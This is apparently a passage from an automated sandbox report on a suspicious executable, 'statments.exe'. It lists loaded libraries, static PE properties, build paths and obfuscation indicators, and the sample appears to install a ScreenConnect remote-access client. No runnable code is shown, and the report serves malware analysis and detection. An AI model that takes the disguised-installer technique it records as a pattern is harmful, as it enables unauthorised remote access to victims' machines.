                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\statments.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: statments.exeStatic PE information: certificate valid
                              Source: statments.exeStatic file information: File size 5652448 > 1048576
                              Source: statments.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: statments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: statments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: statments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: statments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: statments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: statments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: statments.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: statments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1676790291.0000000000CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statments.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statments.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statments.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statments.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677160184.0000000000F80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677294239.0000000000FC2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statments.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1608297355.00000000005AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statments.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1575096863.0000000004250000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statments.exe, MSI3C18.tmp.3.dr, 4d36d8.msi.3.dr, setup.msi.1.dr, MSI3C77.tmp.3.dr, MSI3F66.tmp.3.dr, 4d36d9.rbs.3.dr, 4d36da.msi.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statments.exe, 4d36d8.msi.3.dr, setup.msi.1.dr, MSI2F66.tmp.2.dr, 4d36da.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statments.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1676790291.0000000000CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statments.exe
                              Source: statments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: statments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: statments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: statments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: statments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 1.0.statments.exe.9578f8.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 1.2.statments.exe.1230000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: statments.exeStatic PE information: real checksum: 0x54fd91 should be: 0x56e39d
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_01186F00 push eax; mov dword ptr [esp], ecx1_2_01186F11
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_055F5522 push eax; retf 1_2_055F5529
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_068E8480 push es; ret 5_3_068E8490
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_068E29A0 push es; ret 5_3_068E29B0
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_00CF7752 push 84038DCFh; iretd 8_2_00CF7759
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_00CF7732 push eax; iretd 8_2_00CF7739
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_00CF5A05 pushfd ; iretd 8_2_00CF5A1A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051A0640 pushad ; ret 8_2_051A0653
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051B3ABD push ebx; retf 8_2_051B3ADA
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4A8B00BD pushad ; iretd 10_2_00007FFB4A8B00C1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC2F3C pushfd ; iretd 10_2_00007FFB4ABC2F3D
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC5800 pushad ; retn 4ABBh10_2_00007FFB4ABC5859
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC7D94 push ss; iretd 10_2_00007FFB4ABC7D95
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC098F8 push cs; iretd 11_2_00007FFB4AC09BCF
